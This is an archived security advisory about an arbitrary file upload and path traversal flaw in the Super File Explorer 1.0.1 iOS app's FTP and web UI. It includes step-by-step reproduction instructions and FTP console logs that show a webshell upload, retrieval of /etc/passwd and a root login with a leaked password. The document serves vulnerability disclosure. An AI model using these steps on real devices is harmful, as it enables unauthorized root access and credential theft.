Super File Explorer 1.0.1 Arbitrary File Upload

2017-05-03T00:00:00
ID PACKETSTORM:142375
Type packetstorm
Reporter Benjamin Kunz Mejri
Modified 2017-05-03T00:00:00

Description

                                        
                                            `Document Title:  
===============  
Super File Explorer 1.0.1 - Arbitrary File Upload Vulnerability  
  
  
References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2034  
  
  
Release Date:  
=============  
2017-02-23  
  
  
Vulnerability Laboratory ID (VL-ID):  
====================================  
2034  
  
  
Common Vulnerability Scoring System:  
====================================  
7  
  
  
Product & Service Introduction:  
===============================  
This app is a file manager and viewer. For iPhone, iPod touch, and iPad. Copy, paste, rename, and move files. Integrates with   
AttachmentSaver, Safari Download Manager. Dynamic file sharing folder of iTunes. Manage files in your Dropbox, SugarSync,   
etc. Send files as email attachments. View and download email attachments. Full screen file viewer.  
  
(COpy of the Homepage: https://itunes.apple.com/de/app/super-file-explorer-file-viewer-file-manager/id1101973946 )  
  
  
Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered a vulnerability in the Super File Explorer v1.0.1 iOS mobile application.  
  
  
Vulnerability Disclosure Timeline:  
==================================  
2017-02-23: Public Disclosure (Vulnerability Laboratory)  
  
  
Discovery Status:  
=================  
Published  
  
  
Affected Product(s):  
====================  
LZX Apps  
Product: Super File Explorer - File Viewer & File Manager (Wifi UI & FTP) 1.0.1  
  
  
Exploitation Technique:  
=======================  
Remote  
  
  
Severity Level:  
===============  
High  
  
  
Technical Details & Description:  
================================  
An arbitrary file upload web vulnerability has been discovered in the official Super File Explorer v1.0.1 iOS mobile application.   
The web vulnerability allows remote attackers to upload arbitrary files to compromise for example the file system of a service.  
  
The vulnerability is located in the developer path that is accessable and hidden within next to the root path.  
Remote attackers are able to upload malicious files like webshells to the developer path to access within a next   
step the `/etc/passwd` file of the ftp service. Thus allows the attacker to gain finally access to the root access   
credentials of the ftp application to compromise the service or mobile device. The permission rights within the   
developer path allows an attacker to gain access to the passwd files and other sensitive data.   
  
By default there is no password setup for the ftp or web ui account. Attackers can for example access the ftp via console   
to upload a local file to the developer path. After that the attacker can remotly access the at same time activated ftp   
web ui service to execute the file. Then the attacker downloads the passwd file and can login with the ftp root credentials   
to the service.  
  
The security risk of the vulnerability is estimated as high with a common vulnerability scoring system count of 7.0.   
Exploitation of the web vulnerability requires a low privilege ftp application user account and no user interaction.   
Successful exploitation of the arbitrary file upload web vulnerability results in application or device compromise.  
  
  
Proof of Concept (PoC):  
=======================  
The arbitrary file upload web vulnerability can be exploited by remote attackers without privilege application   
user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided   
information and steps below to continue.  
  
  
Manual steps to reproduce the vulnerability ...  
1. Install the vulnerable mobile ios application to your test idevice (iphone)  
2. Start the mobile device software  
3. Start the ftp and web-server via remote manager button push  
4. Open the ftp via console and login as random user with any credentials  
5. Move to the developer path in the upper folder  
6. Upload of a remote system or the local system path via network a webshell  
7. Open ftp web ui url (http://localhost) and move to the developer path  
8. Open the webshell and request via GET the "/etc/passwd" file that is accessable  
9. Login again to the ftp server using the root:smx7MYTQIi2M  
10. Successful root access to compromise the ftp server and mobile via arbitrary file upload vulnerability!  
  
  
FTP WEB UI URL:  
http://localhost  
  
FTP SERVER URL:   
locahost:2121  
  
  
--- PoC Exploitation ---  
C:UsersAdmin>ftp  
ftp> open 192.168.2.241 2121  
Verbindung mit 192.168.2.241 wurde hergestellt.  
220 iosFtp server ready.  
502 Unknown command 'UTF8'  
Benutzer (192.168.2.241:(none)): anonymous  
331 Password required for anonymous  
Kennwort: a@b.com  
230 User anonymous logged in.  
ftp> cd ..  
250 CWD command successful.  
ftp> dir  
200 PORT command successful.  
150 Opening ASCII mode data connection for '/bin/ls'.  
total 3  
drwxr-xr-x 1 mobile mobile 68 Feb 17 22:02 Documents  
drwxr-xr-x 3 mobile mobile 170 Feb 17 22:05 Library  
drwxr-xr-x 1 mobile mobile 68 Feb 17 22:02 tmp  
226 Transfer complete.  
FTP: 199 Bytes empfangen in 0.01Sekunden 13.27KB/s  
ftp> cd /../  
250 CWD command successful.  
ftp> dir  
200 PORT command successful.  
150 Opening ASCII mode data connection for '/bin/ls'.  
total 13  
---------- 1 (null) (null) 0 (null) Applications  
drwxrwxr-x 1 root admin 68 May 29 23:45 Developer  
---------- 1 (null) (null) 0 (null) Library  
---------- 1 (null) (null) 0 (null) System  
---------- 1 (null) (null) 0 (null) bin  
---------- 1 (null) (null) 0 (null) cores  
---------- 1 (null) (null) 0 (null) dev  
---------- 1 (null) (null) 0 (null) etc  
---------- 1 (null) (null) 0 (null) private  
---------- 1 (null) (null) 0 (null) sbin  
---------- 1 (null) (null) 0 (null) tmp  
---------- 1 (null) (null) 0 (null) usr  
---------- 1 (null) (null) 0 (null) var  
226 Transfer complete.  
ftp> help  
Befehle kAPnnen abgekA1/4rzt werden. Befehle sind:  
  
! delete literal prompt send  
? debug ls put status  
append dir mdelete pwd trace  
ascii disconnect mdir quit type  
bell get mget quote user  
binary glob mkdir recv verbose  
bye hash mls remotehelp  
cd help mput rename  
close lcd open rmdir  
ftp> mget  
Remotedateien server/path/files/webshell  
FTP: 734 Bytes empfangen in 0.08Sekunden 9.41KB/s  
ftp> put  
Lokale Datei webshell  
Remotedatei /Developers/  
-  
Note: Now, open the web interface and surf on the ftp web ui to the webshell in the developer path   
which owns user executable rights in the root path. Open the download module and insert the following   
value "get /etc/passwd". The passwd file is tranfered with the following accounts ...  
-  
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false  
root:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/sh  
mobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/sh  
daemon:*:1:1:System Services:/var/root:/usr/bin/false  
_ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false  
_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false  
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false  
_installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false  
_neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false  
_ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false  
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false  
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false  
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false  
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false  
_distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false  
_astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false  
_ondemand:*:249:249:On Demand Resource Daemon:/var/db/ondemand:/usr/bin/false  
_findmydevice:*:254:254:Find My Device Daemon:/var/db/findmydevice:/usr/bin/false  
_datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false  
_captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false  
-   
Now login as root via system administrator account and move to the root path of the application to improve the permission.  
-  
ftp> open 192.168.2.241 2121  
Verbindung mit 192.168.2.241 wurde hergestellt.  
220 iosFtp server ready.  
502 Unknown command 'UTF8'  
Benutzer (192.168.2.241:(none)): root  
331 Password required for root  
Kennwort: smx7MYTQIi2M  
230 User root logged in.  
ftp> cd /../  
250 CWD command successful.  
ftp> dir  
200 PORT command successful.  
150 Opening ASCII mode data connection for '/bin/ls'.  
total 13  
drwxrwxr-x 1 root admin 0 (null) Applications  
drwxrwxr-x 1 root admin 68 May 29 23:45 Developer  
drwxrwxr-x 1 root admin 0 (null) Library  
drwxrwxr-x 1 root admin 0 (null) System  
drwxrwxr-x 1 root admin 0 (null) bin  
drwxrwxr-x 1 root admin 0 (null) cores  
drwxrwxr-x 1 root admin 0 (null) dev  
drwxrwxr-x 1 root admin 0 (null) etc  
drwxrwxr-x 1 root admin 0 (null) private  
drwxrwxr-x 1 root admin 0 (null) sbin  
drwxrwxr-x 1 root admin 0 (null) tmp  
drwxrwxr-x 1 root admin 0 (null) usr  
drwxrwxr-x 1 root admin 0 (null) var  
226 Transfer complete.  
FTP: 734 Bytes empfangen in 0.08Sekunden 9.41KB/s  
ftp> get /etc/passwd  
200 PORT command successful.  
150 Opening BINARY mode data connection for '/etc/passwd'.  
226 Transfer complete.  
FTP: 1323 Bytes empfangen in 0.00Sekunden 1323000.00KB/s  
  
  
Solution - Fix & Patch:  
=======================  
The vulnerability can be resolved by a change of the root credentials, in combination with the setup of secure access permission   
rights for the web ui in the developer path. Disallow to use /../ to request the static root path as developer without permission.  
  
  
Security Risk:  
==============  
The security risk of the arbitrary file upload vulnerability in the mobile ftp application is estimated as high. (CVSS 7.0)  
  
  
Credits & Authors:  
==================  
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)  
  
  
Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed   
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable   
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab   
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for   
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,   
deface websites, hack into databases or trade with stolen data.  
  
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com  
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact  
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab  
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php  
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php  
  
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.   
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by   
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark   
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.  
  
Copyright A(c) 2017 | Vulnerability Laboratory - [Evolution Security GmbH]aC/  
  
--   
VULNERABILITY LABORATORY - RESEARCH TEAM  
SERVICE: www.vulnerability-lab.com  
  
`